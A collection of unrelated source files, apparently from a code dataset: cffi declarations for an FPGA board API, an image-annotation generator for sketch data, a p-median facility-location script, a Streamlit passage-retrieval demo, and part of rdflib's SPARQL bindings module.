void okPLL22393_SetOutputEnable(okPLL22393_HANDLE pll, int n, Bool enable);
int okPLL22393_GetPLLP(okPLL22393_HANDLE pll, int n);
int okPLL22393_GetPLLQ(okPLL22393_HANDLE pll, int n);
double okPLL22393_GetPLLFrequency(okPLL22393_HANDLE pll, int n);
int okPLL22393_GetOutputDivider(okPLL22393_HANDLE pll, int n);
ok_ClockSource_22393 okPLL22393_GetOutputSource(okPLL22393_HANDLE pll, int n);
double okPLL22393_GetOutputFrequency(okPLL22393_HANDLE pll, int n);
Bool okPLL22393_IsOutputEnabled(okPLL22393_HANDLE pll, int n);
Bool okPLL22393_IsPLLEnabled(okPLL22393_HANDLE pll, int n);
void okPLL22393_InitFromProgrammingInfo(okPLL22393_HANDLE pll, unsigned char *buf);
void okPLL22393_GetProgrammingInfo(okPLL22393_HANDLE pll, unsigned char *buf);
// okPLL22150
//
okPLL22150_HANDLE okPLL22150_Construct();
void okPLL22150_Destruct(okPLL22150_HANDLE pll);
void okPLL22150_SetCrystalLoad(okPLL22150_HANDLE pll, double capload);
void okPLL22150_SetReference(okPLL22150_HANDLE pll, double freq, Bool extosc);
double okPLL22150_GetReference(okPLL22150_HANDLE pll);
Bool okPLL22150_SetVCOParameters(okPLL22150_HANDLE pll, int p, int q);
int okPLL22150_GetVCOP(okPLL22150_HANDLE pll);
int okPLL22150_GetVCOQ(okPLL22150_HANDLE pll);
double okPLL22150_GetVCOFrequency(okPLL22150_HANDLE pll);
void okPLL22150_SetDiv1(okPLL22150_HANDLE pll, ok_DividerSource divsrc, int n);
void okPLL22150_SetDiv2(okPLL22150_HANDLE pll, ok_DividerSource divsrc, int n);
ok_DividerSource okPLL22150_GetDiv1Source(okPLL22150_HANDLE pll);
ok_DividerSource okPLL22150_GetDiv2Source(okPLL22150_HANDLE pll);
int okPLL22150_GetDiv1Divider(okPLL22150_HANDLE pll);
int okPLL22150_GetDiv2Divider(okPLL22150_HANDLE pll);
void okPLL22150_SetOutputSource(okPLL22150_HANDLE pll, int output, ok_ClockSource_22150 clksrc);
void okPLL22150_SetOutputEnable(okPLL22150_HANDLE pll, int output, Bool enable);
ok_ClockSource_22150 okPLL22150_GetOutputSource(okPLL22150_HANDLE pll, int output);
double okPLL22150_GetOutputFrequency(okPLL22150_HANDLE pll, int output);
Bool okPLL22150_IsOutputEnabled(okPLL22150_HANDLE pll, int output);
void okPLL22150_InitFromProgrammingInfo(okPLL22150_HANDLE pll, unsigned char *buf);
void okPLL22150_GetProgrammingInfo(okPLL22150_HANDLE pll, unsigned char *buf);
// okDeviceSensors
//
okDeviceSensors_HANDLE okDeviceSensors_Construct();
void okDeviceSensors_Destruct(okDeviceSensors_HANDLE hnd);
int okDeviceSensors_GetSensorCount(okDeviceSensors_HANDLE hnd);
okTDeviceSensor okDeviceSensors_GetSensor(okDeviceSensors_HANDLE hnd, int n);
// okDeviceSettings
//
okDeviceSettings_HANDLE okDeviceSettings_Construct();
void okDeviceSettings_Destruct(okDeviceSettings_HANDLE hnd);
ok_ErrorCode okDeviceSettings_GetString(okDeviceSettings_HANDLE hnd, const char *key, int length, char *buf);
ok_ErrorCode okDeviceSettings_SetString(okDeviceSettings_HANDLE hnd, const char *key, const char *buf);
ok_ErrorCode okDeviceSettings_GetInt(okDeviceSettings_HANDLE hnd, const char *key, uint32_t *value);
ok_ErrorCode okDeviceSettings_SetInt(okDeviceSettings_HANDLE hnd, const char *key, uint32_t value);
ok_ErrorCode okDeviceSettings_Delete(okDeviceSettings_HANDLE hnd, const char *key);
ok_ErrorCode okDeviceSettings_Save(okDeviceSettings_HANDLE hnd);
// okFirmware and okFirmwarePackage
//
okFirmwarePackage_HANDLE okFirmwarePackage_Load(const char *filename);
void okFirmwarePackage_Destruct(okFirmwarePackage_HANDLE hnd);
int okFirmwarePackage_GetFirmwareCount(okFirmwarePackage_HANDLE hnd);
okFirmware_HANDLE okFirmwarePackage_GetFirmware(okFirmwarePackage_HANDLE hnd, int num);
ok_ErrorCode okFirmware_PerformTasks(okFirmware_HANDLE hnd, const char *serial, okFirmware_PerformTasks_Callback callback, void *arg);
// okFrontPanel
//
okFrontPanel_HANDLE okFrontPanel_Construct();
void okFrontPanel_Destruct(okFrontPanel_HANDLE hnd);
int okFrontPanel_GetErrorString(int ec, char *buf, int length);
ok_ErrorCode okFrontPanel_AddCustomDevice(const okTDeviceMatchInfo* matchInfo, const okTDeviceInfo* devInfo);
ok_ErrorCode okFrontPanel_RemoveCustomDevice(int productID);
ok_ErrorCode okFrontPanel_WriteI2C(okFrontPanel_HANDLE hnd, const int addr, int length, unsigned char *data);
ok_ErrorCode okFrontPanel_ReadI2C(okFrontPanel_HANDLE hnd, const int addr, int length, unsigned char *data);
ok_ErrorCode okFrontPanel_FlashEraseSector(okFrontPanel_HANDLE hnd, uint32_t address);
ok_ErrorCode okFrontPanel_FlashWrite(okFrontPanel_HANDLE hnd, uint32_t address, uint32_t length, const uint8_t *buf);
ok_ErrorCode okFrontPanel_FlashRead(okFrontPanel_HANDLE hnd, uint32_t address, uint32_t length, uint8_t *buf);
ok_ErrorCode okFrontPanel_GetFPGAResetProfile(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, okTFPGAResetProfile *profile);
ok_ErrorCode okFrontPanel_GetFPGAResetProfileWithSize(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, okTFPGAResetProfile *profile, unsigned size);
ok_ErrorCode okFrontPanel_SetFPGAResetProfile(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, const okTFPGAResetProfile *profile);
ok_ErrorCode okFrontPanel_SetFPGAResetProfileWithSize(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, const okTFPGAResetProfile *profile, unsigned size);
ok_ErrorCode okFrontPanel_ReadRegister(okFrontPanel_HANDLE hnd, uint32_t addr, uint32_t *data);
ok_ErrorCode okFrontPanel_ReadRegisters(okFrontPanel_HANDLE hnd, unsigned num, okTRegisterEntry* regs);
ok_ErrorCode okFrontPanel_WriteRegister(okFrontPanel_HANDLE hnd, uint32_t addr, uint32_t data);
ok_ErrorCode okFrontPanel_WriteRegisters(okFrontPanel_HANDLE hnd, unsigned num, const okTRegisterEntry* regs);
int okFrontPanel_GetHostInterfaceWidth(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsHighSpeed(okFrontPanel_HANDLE hnd);
ok_BoardModel okFrontPanel_GetBoardModel(okFrontPanel_HANDLE hnd);
void okFrontPanel_GetBoardModelString(okFrontPanel_HANDLE hnd, ok_BoardModel m, char *buf);
int okFrontPanel_GetDeviceCount(okFrontPanel_HANDLE hnd);
ok_BoardModel okFrontPanel_GetDeviceListModel(okFrontPanel_HANDLE hnd, int num);
void okFrontPanel_GetDeviceListSerial(okFrontPanel_HANDLE hnd, int num, char *buf);
ok_ErrorCode okFrontPanel_OpenBySerial(okFrontPanel_HANDLE hnd, const char *serial);
Bool okFrontPanel_IsOpen(okFrontPanel_HANDLE hnd);
void okFrontPanel_EnableAsynchronousTransfers(okFrontPanel_HANDLE hnd, Bool enable);
ok_ErrorCode okFrontPanel_SetBTPipePollingInterval(okFrontPanel_HANDLE hnd, int interval);
void okFrontPanel_SetTimeout(okFrontPanel_HANDLE hnd, int timeout);
int okFrontPanel_GetDeviceMajorVersion(okFrontPanel_HANDLE hnd);
int okFrontPanel_GetDeviceMinorVersion(okFrontPanel_HANDLE hnd);
ok_ErrorCode okFrontPanel_ResetFPGA(okFrontPanel_HANDLE hnd);
void okFrontPanel_Close(okFrontPanel_HANDLE hnd);
void okFrontPanel_GetSerialNumber(okFrontPanel_HANDLE hnd, char *buf);
ok_ErrorCode okFrontPanel_GetDeviceSensors(okFrontPanel_HANDLE hnd, okDeviceSensors_HANDLE settings);
ok_ErrorCode okFrontPanel_GetDeviceSettings(okFrontPanel_HANDLE hnd, okDeviceSettings_HANDLE settings);
ok_ErrorCode okFrontPanel_GetDeviceInfo(okFrontPanel_HANDLE hnd, okTDeviceInfo *info);
ok_ErrorCode okFrontPanel_GetDeviceInfoWithSize(okFrontPanel_HANDLE hnd, okTDeviceInfo *info, unsigned size);
void okFrontPanel_GetDeviceID(okFrontPanel_HANDLE hnd, char *buf);
void okFrontPanel_SetDeviceID(okFrontPanel_HANDLE hnd, const char *strID);
ok_ErrorCode okFrontPanel_ConfigureFPGA(okFrontPanel_HANDLE hnd, const char *strFilename);
ok_ErrorCode okFrontPanel_ConfigureFPGAWithReset(okFrontPanel_HANDLE hnd, const char *strFilename, const okTFPGAResetProfile *reset);
ok_ErrorCode okFrontPanel_ConfigureFPGAFromMemory(okFrontPanel_HANDLE hnd, unsigned char *data, unsigned long length);
ok_ErrorCode okFrontPanel_ConfigureFPGAFromMemoryWithReset(okFrontPanel_HANDLE hnd, unsigned char *data, unsigned long length, const okTFPGAResetProfile *reset);
ok_ErrorCode okFrontPanel_ConfigureFPGAFromFlash(okFrontPanel_HANDLE hnd, unsigned long configIndex);
ok_ErrorCode okFrontPanel_GetPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_SetPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_GetEepromPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_SetEepromPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_GetPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_SetPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_GetEepromPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_SetEepromPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_LoadDefaultPLLConfiguration(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsFrontPanelEnabled(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsFrontPanel3Supported(okFrontPanel_HANDLE hnd);
void okFrontPanel_UpdateWireIns(okFrontPanel_HANDLE hnd);
ok_ErrorCode okFrontPanel_GetWireInValue(okFrontPanel_HANDLE hnd, int epAddr, uint32_t *val);
ok_ErrorCode okFrontPanel_SetWireInValue(okFrontPanel_HANDLE hnd, int ep, unsigned long val, unsigned long mask);
void okFrontPanel_UpdateWireOuts(okFrontPanel_HANDLE hnd);
unsigned long okFrontPanel_GetWireOutValue(okFrontPanel_HANDLE hnd, int epAddr);
ok_ErrorCode okFrontPanel_ActivateTriggerIn(okFrontPanel_HANDLE hnd, int epAddr, int bit);
void okFrontPanel_UpdateTriggerOuts(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsTriggered(okFrontPanel_HANDLE hnd, int epAddr, unsigned long mask);
long okFrontPanel_GetLastTransferLength(okFrontPanel_HANDLE hnd);
long okFrontPanel_WriteToPipeIn(okFrontPanel_HANDLE hnd, int epAddr, long length, unsigned char *data);
long okFrontPanel_ReadFromPipeOut(okFrontPanel_HANDLE hnd, int epAddr, long length, unsigned char *data);
long okFrontPanel_WriteToBlockPipeIn(okFrontPanel_HANDLE hnd, int epAddr, int blockSize, long length, unsigned char *data);
long okFrontPanel_ReadFromBlockPipeOut(okFrontPanel_HANDLE hnd, int epAddr, int blockSize, long length, unsigned char *data);
// okFrontPanelManager
//
okCFrontPanelManager_HANDLE okFrontPanelManager_Construct(okFrontPanelManager_HANDLE self, const char* realm);
void okFrontPanelManager_Destruct(okCFrontPanelManager_HANDLE hnd);
ok_ErrorCode okFrontPanelManager_StartMonitoring(okCFrontPanelManager_HANDLE hnd);
okFrontPanel_HANDLE okFrontPanelManager_Open(okCFrontPanelManager_HANDLE hnd, const char *serial);
// FrontPanelDevices
//
okCFrontPanelDevices_HANDLE okFrontPanelDevices_Construct(const char* realm);
void okFrontPanelDevices_Destruct(okCFrontPanelDevices_HANDLE hnd);
int okFrontPanelDevices_GetCount(okCFrontPanelDevices_HANDLE hnd);
void okFrontPanelDevices_GetSerial(okCFrontPanelDevices_HANDLE hnd, int num, char* buf);
okFrontPanel_HANDLE okFrontPanelDevices_Open(okCFrontPanelDevices_HANDLE hnd, const char* serial);
""")
if __name__ == "__main__":
ffibuilder.compile(verbose=True)
``` |
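Running `python wrapper_build.py` compiles the extension; a hedged sketch of driving the generated module, which exposes the usual cffi pair `ffi`/`lib` (this assumes the OpalKelly FrontPanel shared library is installed and on the loader path):
```python
# Sketch only: enumerate attached devices through the generated wrapper.
from okfrontpanel._wrapper import ffi, lib

hnd = lib.okFrontPanel_Construct()
try:
    count = lib.okFrontPanel_GetDeviceCount(hnd)
    serial = ffi.new("char[]", lib.OK_MAX_SERIALNUMBER_LENGTH)
    for i in range(count):
        lib.okFrontPanel_GetDeviceListSerial(hnd, i, serial)
        print(i, ffi.string(serial).decode())
finally:
    lib.okFrontPanel_Destruct(hnd)
```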
{
"source": "JJongSue/fastrnn",
"score": 3
} |
#### File: JJongSue/fastrnn/npy2txt.py
```python
import matplotlib.pylab as plt
import numpy as np
from PIL import Image
import random
import json
from collections import OrderedDict
MAX_X = 1200
MAX_Y = 720
'''
Code that converts npy files into txt annotation files.
'''
NPY_FOLDER = 'npyfiles/'
SAVE_FOLDER = 'data'
def pasta_img(origin_img, num_i):
sizex = random.randint(28, 700)
sizey = random.randint(28, 700)
x = random.randint(0, MAX_X-sizex)
y = random.randint(0, MAX_Y-sizey)
i = num_i.reshape(28,28)
im = Image.fromarray(i)
resize_image = im.resize((sizex,sizey))
    origin_img.paste(resize_image, (x, y, x + sizex, y + sizey))  # paste onto the passed-in image, not the global
return x,y, sizex, sizey
'''
Code for checking image resizing and image compositing.
'''
nps = np.load(NPY_FOLDER+'house.npy')
file_data = OrderedDict()
f = open("house.txt", 'w')
print(nps[0])
for i in range(1000):
cnt = random.randint(1,3)
file_name = str(i) + '.jpg'
new_img = Image.new("RGB", (MAX_X, MAX_Y))
for j in range(cnt):
        randomi = random.randint(0, len(nps) - 1)  # randint is inclusive at both ends
x, y, sizex, sizey = pasta_img(new_img, nps[randomi])
inputstr = (SAVE_FOLDER+"/"+file_name)+","+str(x)+","+str(y)+","+str(x+sizex)+","+str(y+sizey)+",house\n"
f.write(inputstr)
new_img.save(SAVE_FOLDER+"/"+file_name)
# file_data[file_name] = inputd
# with open(SAVE_FOLDER+'/train/via_region_data.json', 'w', encoding='utf-8') as make_file:
# json.dump(file_data, make_file, ensure_ascii=False, indent="\t")
# file_data = OrderedDict()
# for i in range(8, 10):
# file_name = str(i) + '.jpg'
# new_img = Image.new("RGB", (MAX_X, MAX_Y))
# x, y, sizex, sizey = pasta_img(new_img, nps[i])
# new_img.save(SAVE_FOLDER+"/"+"val/"+file_name)
# inputd = OrderedDict()
# inputd['fileref'] = ""
# inputd['filename'] = file_name
# inputd['base64_img_data'] = ""
# inputd['file_attributes'] = OrderedDict()
# inputd['regions'] = {
# "0":{
# "shape_attributes": {
# "name": "polygon",
# 'all_points_x': [x, x+sizex, x+sizex, x],
# 'all_points_y': [y, y, y+sizey, y+sizey]},
# # "x": x,
# # "y": y,
# # "width": sizex,
# # "height": sizey},
# "region_attributes": {}
# }
# }
# file_data[file_name] = inputd
# with open(SAVE_FOLDER+'/val/via_region_data.json', 'w', encoding='utf-8') as make_file:
# json.dump(file_data, make_file, ensure_ascii=False, indent="\t")
# cnt = 1
# for i in nps:
# new_img = Image.new("RGB", (1200, 720))
# pasta_img(new_img,
# # im.show()
# # im.save('eye.bmp')
# if cnt == 10:
# break
``` |
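The script writes one `<image path>,x1,y1,x2,y2,<class>` line per pasted sprite, the CSV layout used by keras-retinanet style loaders; a small sketch of reading it back:
```python
# Sketch only: parse the annotation file produced above.
def load_annotations(path):
    boxes = []
    with open(path) as f:
        for line in f:
            img, x1, y1, x2, y2, label = line.strip().split(",")
            boxes.append((img, int(x1), int(y1), int(x2), int(y2), label))
    return boxes

for img, x1, y1, x2, y2, label in load_annotations("house.txt")[:3]:
    print(img, (x1, y1, x2, y2), label)
```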
{
"source": "jjonhwa/Policy-to-utilize-DT-in-traditional-markets",
"score": 3
} |
#### File: Policy-to-utilize-DT-in-traditional-markets/pmedian/pmedian.py
```python
import pandas as pd
import folium
import math
from itertools import combinations
from pyproj import Proj, transform
from tqdm import tqdm
from typing import List
def preprocess_data(path: str) -> pd.DataFrame:
"""
"Note": Modify and use according to your own data.
        Alternatively, skip this function and put the preprocessing code directly in "main".
    Explanation
        Takes a data path as input and returns the data arranged in the order "name"/"latitude"/"longitude".
Arguments
path: A path of a file in the form of 'xlsx' and 'csv' is input.
Return
Pandas Data Frame: Form of Pandas Data Frame with Column in the order of "Name", "Latitude", and "Longitude"
"""
if "xlsx" in path:
data = pd.read_excel(path)
############ Modify according to input/output ####################
if "대구분명칭" in data.columns:
data = data[["대구분명칭", "위도", "경도"]]
elif "시장명" in data.columns:
data = data[["시장명", "위도", "경도"]]
data.columns = ["name", "latitude", "longitude"]
##########################################################
elif "csv" in path:
data = pd.read_csv(
path, header=None
) # Header options are also modified according to your data.
############ Modify according to input/output ####################
data.columns = ["longitude", "latitude", "name"]
data = data[["name", "latitude", "longitude"]]
##########################################################
return data
def coordinate_change(data: pd.DataFrame, c1: str, c2: str) -> pd.DataFrame:
"""
Explanation
        The latitude and longitude columns in the data frame are converted from coordinate system c1 to coordinate system c2.
Arguments
data: The columns are in the form of a Pandas Data Frame in the order of "name", "latitude", and "longitude".
c1: The original latitude and longitude coordinate system.
c2: The latitude and longitude coordinate system to convert.
c1 & c2: something like 'epsg:5178', 'epsg:4326', etc..
Return
Pandas Data Frame: Data frame with converted latitude and longitude coordinates.
"""
proj_c1 = Proj(init=c1)
proj_c2 = Proj(init=c2)
for i in tqdm(range(len(data))):
change_long, change_lat = transform(
proj_c1, proj_c2, data["longitude"][i], data["latitude"][i]
)
data["longitude"][i] = change_long
data["latitude"][i] = change_lat
return data
def shortest_distance(F: pd.DataFrame, L: pd.DataFrame):
"""
Explanation
        Create the shortest-distance matrix between public facilities and the floating population.
Arguments
F: Coordinates of public facilities.
L: Coordinates of the floating population.
Return
Pandas Data Frame: Shortest distance matrix between public facilities and floating population
"""
F_list = []
L_list = []
for i in range(len(F)):
name = f"F_{i}"
F_list.append(name)
for i in range(len(L)):
name = f"L_{i}"
L_list.append(name)
distance = pd.DataFrame(columns=F_list, index=L_list)
for i in range(len(distance)):
for j, col in enumerate(distance.columns):
square_sum = ((F["latitude"][j] - L["latitude"][i]) ** 2) + (
(F["longitude"][j] - L["longitude"][i]) ** 2
)
dist = math.sqrt(square_sum)
distance[col][i] = dist
return distance
def p_list_set(distance_data: pd.DataFrame, p: int) -> List[List]:
"""
Explanation
Based on F(Public Facilities), '2p' public facilities with the shortest
distance from the floating population coordinates are selected
Args
distance_data: The matrix of distances between F and L. (column = F, row = L)
p: The number of public facilities to be finally selected.
return
p_list_set: A set of p lists tied up in p
ex) candidate= [1,2,3,4,5,6,7,8,9,10] / p=3
p_list_set = [
[1,2,3],
[2,3,4],
[3,4,5]
]
"""
# The sum of the distances between the coordinates of the floating population for public facilities.
col_sum = list(distance_data.sum(axis=0))
col_sum_tuple = [] # Tie col_sum with index.
for i in range(len(col_sum)):
tup = (i, col_sum[i])
col_sum_tuple.append(tup)
col_sum_tuple.sort(key=lambda x: x[1])
col_sum_tuple = col_sum_tuple[: 2 * p] # Choose the top 2p based on distance.
p_list_set = [col_sum_tuple[i : i + p] for i in range(p)]
return p_list_set
def candidate_place(
pb: pd.DataFrame, distance: pd.DataFrame, p_list_set: List[List]
) -> List:
"""
Explanation
        Pick the candidate set with the minimal total distance and extract its facility names from the DataFrame.
Args:
pb: DataFrame for public facilities.
distance: DataFrame about the distance between F and L
p_list_set: In distance, a set of p lists grouped by p based on distance
Return:
List: List of names of p public facilities.
"""
min_sum_list = [] # take the minimum values in the pth list.
for i in range(len(p_list_set)):
tup_check = []
for j in p_list_set[i]:
tup_check.append(f"F_{j[0]}")
check_df = distance[tup_check]
check_df["min"] = 0 # generate 'min' column
for k in range(len(check_df)):
k_th_row = check_df.iloc[k][:-1] # exclude 'min' column
check_df["min"][k] = min(k_th_row)
min_sum_value = sum(check_df["min"])
min_sum_list.append(min_sum_value)
final_index = min_sum_list.index(min(min_sum_list))
final_set = p_list_set[final_index]
final_set.sort(key=lambda x: x[0])
final_idx = [idx for idx, dist in final_set]
final_market_data = pb.iloc[final_idx, :]
final_market_data.reset_index(drop=True, inplace=True)
name_list = [name for name in final_market_data["name"]]
return name_list
def top_value(char_list: List) -> int:
"""Heuristic Method with P-Median
Explanation
Get the top three to six. (If there is a duplicate value, bring up to six.)
Args:
char_list: A list of the names of the final candidates.
Return:
int: The number of final candidates to get
"""
appearance_candidate = list(pd.Series(char_list).value_counts())
num_of_candidate = 3
for first, second in zip(appearance_candidate[2:], appearance_candidate[3:]):
if first == second:
num_of_candidate += 1
else:
break
return num_of_candidate
def make_finalset(market_data: pd.DataFrame, char_list: List) -> pd.DataFrame:
"""Heuristic Method with P-Median
Explanation
After receiving the char_list, which is the list of the final candidates,
The final candidates is mapped with public facility data
to return a DataFrame containing only the final candidates.
Args:
market_data: Data containing market location information.
char_list: The list with the names of the final candidates overlapped.
Return:
Pandas DataFrame: The final DataFrame containing the names, latitudes, and longitude of the final candidates.
"""
num_of_candidate = top_value(char_list)
final_name_list = pd.Series(char_list).value_counts().index[:num_of_candidate]
market_index = [
(market_data[market_data["name"] == name].index)[0] for name in final_name_list
]
market_final = market_data.iloc[market_index, :]
market_final.reset_index(drop=True, inplace=True)
return market_final
if __name__ == "__main__":
# Insert your own data
    pf_location_path = "../data/울진군예상좌표.xlsx"  # market: region_public-facility / latitude / longitude
    population_location_path = "../data/울진_편의점.csv"  # population: region_floating-population / latitude / longitude
# Dataset Upload
pf_data = preprocess_data(pf_location_path)
population_data = preprocess_data(population_location_path)
    # Change coordinate system
pf_data = coordinate_change(pf_data, "epsg:4326", "epsg:5178")
population_data = coordinate_change(population_data, "epsg:4326", "epsg:5178")
    # Calculate distance between public facilities and floating population
distance = shortest_distance(pf_data, population_data)
# Using Heuristic P-Median
char_list = []
for p in range(3, 11):
p_list = p_list_set(distance, p)
name_list = candidate_place(pf_data, distance, p_list)
char_list.extend(name_list)
pf_final = make_finalset(pf_data, char_list)
pf_final = coordinate_change(pf_final, "epsg:5178", "epsg:4326")
print(pf_final)
``` |
{
"source": "jjonhwa/Retrieval_Streamlit_Demo",
"score": 2
} |
#### File: jjonhwa/Retrieval_Streamlit_Demo/app.py
```python
import streamlit as st
import yaml
import torch
from loading import load_q_encoder, load_c_encoder, load_p_embedding, get_tokenizer
from encoder import BertEncoder_For_BiEncoder, RoBertaEncoder_For_CrossEncoder
from utils import Passage_Embedding
from rerank import get_relavant_doc, rerank
from confirm_button_hack import cache_on_button_press
st.set_page_config(layout="wide")
BertEncoder = BertEncoder_For_BiEncoder
RoBertaEncoder = RoBertaEncoder_For_CrossEncoder
if "q_encoder" not in st.session_state:
    with st.spinner("Loading.."):
with open("config.yaml") as f:
config = yaml.load(f, Loader=yaml.FullLoader)
st.session_state.p_embs = load_p_embedding()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
st.session_state.q_encoder = load_q_encoder()
st.session_state.corpus = Passage_Embedding(
config["wikipedia_path"], p_encoder=None
).get_corpus()
st.session_state.tokenizer = get_tokenizer()
st.session_state.c_encoder = load_c_encoder()
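# Added note (not in the original app): Streamlit re-executes this script on
# every widget interaction, so the heavy objects above (passage embeddings,
# encoders, corpus, tokenizer) are cached in st.session_state to avoid
# reloading them on each rerun.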
def main():
p_embs = st.session_state.p_embs
q_encoder = st.session_state.q_encoder
c_encoder = st.session_state.c_encoder
tokenizer = st.session_state.tokenizer
corpus = st.session_state.corpus
    text_input = st.text_input("질문을 입력해주세요.")  # "Please enter your question."
    st.write(text_input)
    # query = "나폴레옹이 죽은 날짜는?"  # example query: "On what date did Napoleon die?"
    query = [text_input]
    k = 5
    if st.button("자세히 찾기"):  # "Detailed search"
        st.write("약 1분 정도 소요됩니다.")  # "This takes about one minute."
with st.spinner("Please wait.."):
k_plus = k * 10
doc_scores, doc_indices = get_relavant_doc(
q_encoder, tokenizer, query, p_embs, k=k_plus
)
result_scores, result_indices = rerank(
query, c_encoder, doc_indices, corpus, tokenizer
)
            # get the final Top-k passages by re-ranking the top k*10 (= 50) candidates
final_indices = []
for i in range(len(doc_indices)):
t_list = [doc_indices[i][result_indices[i][j]] for j in range(k)]
final_indices.append(t_list)
st.write("-------------------------------------")
for i in range(k):
st.write(corpus[final_indices[0][i]])
st.write("-------------------------------------")
    if st.button("빠르게 찾기"):  # "Quick search"
with st.spinner("Please wait.."):
doc_scores, doc_indices = get_relavant_doc(
q_encoder, tokenizer, query, p_embs, k=k
)
# st.write(corpus[doc_indices[0][0]])
st.write("-------------------------------------")
for i in range(k):
st.write(corpus[doc_indices[0][i]])
st.write("-------------------------------------")
root_password = "<PASSWORD>"
password = st.text_input(
    "AI BoostCamp 2기! Product Serving Master는 누구인가요?", type="password"
)  # "AI BoostCamp cohort 2! Who is the Product Serving master?"
@cache_on_button_press("Authenticate")
def authenticate(password) -> bool:
return password == root_password
if authenticate(password):
    st.success("성공!")  # "Success!"
st.title("Retrieve Document about Question")
main()
else:
    st.error("부스트캠프 AI Tech 2기 멤버가 아닌가요?")  # "Aren't you a member of BoostCamp AI Tech cohort 2?"
``` |
{
"source": "jjon/rdflib",
"score": 3
} |
#### File: plugins/sparql/sparql.py
```python
import collections
import datetime
import itertools
import typing as t
from typing import Any, Container, Dict, Iterable, List, Optional, Tuple, Union
import isodate
import rdflib.plugins.sparql
from rdflib.compat import Mapping, MutableMapping
from rdflib.graph import ConjunctiveGraph, Graph
from rdflib.namespace import NamespaceManager
from rdflib.plugins.sparql.parserutils import CompValue
from rdflib.term import BNode, Identifier, Literal, Node, URIRef, Variable
class SPARQLError(Exception):
def __init__(self, msg: Optional[str] = None):
Exception.__init__(self, msg)
class NotBoundError(SPARQLError):
def __init__(self, msg: Optional[str] = None):
SPARQLError.__init__(self, msg)
class AlreadyBound(SPARQLError):
"""Raised when trying to bind a variable that is already bound!"""
def __init__(self):
SPARQLError.__init__(self)
class SPARQLTypeError(SPARQLError):
def __init__(self, msg: Optional[str]):
SPARQLError.__init__(self, msg)
class Bindings(MutableMapping):
"""
A single level of a stack of variable-value bindings.
    Each dict keeps a reference to the dict below it, and
    any failed lookup is propagated back up the chain.
    In Python 3.3+ this could be a collections.ChainMap
"""
    def __init__(self, outer: Optional["Bindings"] = None, d=()):
self._d: Dict[str, str] = dict(d)
self.outer = outer
def __getitem__(self, key: str) -> str:
if key in self._d:
return self._d[key]
if not self.outer:
raise KeyError()
return self.outer[key]
def __contains__(self, key: Any) -> bool:
try:
self[key]
return True
except KeyError:
return False
def __setitem__(self, key: str, value: Any) -> None:
self._d[key] = value
def __delitem__(self, key: str) -> None:
raise Exception("DelItem is not implemented!")
def __len__(self) -> int:
i = 0
d: Optional[Bindings] = self
while d is not None:
i += len(d._d)
d = d.outer
return i
def __iter__(self):
d = self
while d is not None:
yield from d._d
d = d.outer
def __str__(self) -> str:
# type error: Generator has incompatible item type "Tuple[Any, str]"; expected "str"
return "Bindings({" + ", ".join((k, self[k]) for k in self) + "})" # type: ignore[misc]
def __repr__(self) -> str:
return str(self)
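# Illustrative sketch (added; not part of rdflib): lookups fall through to the
# outer level, so pushing a new Bindings layer shadows without copying, e.g.
#   outer = Bindings(d=[("x", "1")])
#   inner = Bindings(outer=outer, d=[("y", "2")])
#   inner["x"]  # -> "1", resolved from the outer layer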
class FrozenDict(Mapping):
"""
An immutable hashable dict
Taken from http://stackoverflow.com/a/2704866/81121
"""
def __init__(self, *args: Any, **kwargs: Any):
self._d: Dict[Identifier, Identifier] = dict(*args, **kwargs)
self._hash: Optional[int] = None
def __iter__(self):
return iter(self._d)
def __len__(self) -> int:
return len(self._d)
def __getitem__(self, key: Identifier) -> Identifier:
return self._d[key]
def __hash__(self) -> int:
# It would have been simpler and maybe more obvious to
# use hash(tuple(sorted(self._d.items()))) from this discussion
# so far, but this solution is O(n). I don't know what kind of
# n we are going to run into, but sometimes it's hard to resist the
# urge to optimize when it will gain improved algorithmic performance.
if self._hash is None:
self._hash = 0
for key, value in self.items():
self._hash ^= hash(key)
self._hash ^= hash(value)
return self._hash
def project(self, vars: Container[Variable]) -> "FrozenDict":
return FrozenDict((x for x in self.items() if x[0] in vars))
def disjointDomain(self, other: t.Mapping[Identifier, Identifier]) -> bool:
return not bool(set(self).intersection(other))
def compatible(self, other: t.Mapping[Identifier, Identifier]) -> bool:
for k in self:
try:
if self[k] != other[k]:
return False
except KeyError:
pass
return True
def merge(self, other: t.Mapping[Identifier, Identifier]) -> "FrozenDict":
res = FrozenDict(itertools.chain(self.items(), other.items()))
return res
def __str__(self) -> str:
return str(self._d)
def __repr__(self) -> str:
return repr(self._d)
class FrozenBindings(FrozenDict):
def __init__(self, ctx: "QueryContext", *args, **kwargs):
FrozenDict.__init__(self, *args, **kwargs)
self.ctx = ctx
def __getitem__(self, key: Union[Identifier, str]) -> Identifier:
if not isinstance(key, Node):
key = Variable(key)
if not isinstance(key, (BNode, Variable)):
return key
if key not in self._d:
# type error: Value of type "Optional[Dict[Variable, Identifier]]" is not indexable
# type error: Invalid index type "Union[BNode, Variable]" for "Optional[Dict[Variable, Identifier]]"; expected type "Variable"
return self.ctx.initBindings[key] # type: ignore[index]
else:
return self._d[key]
def project(self, vars: Container[Variable]) -> "FrozenBindings":
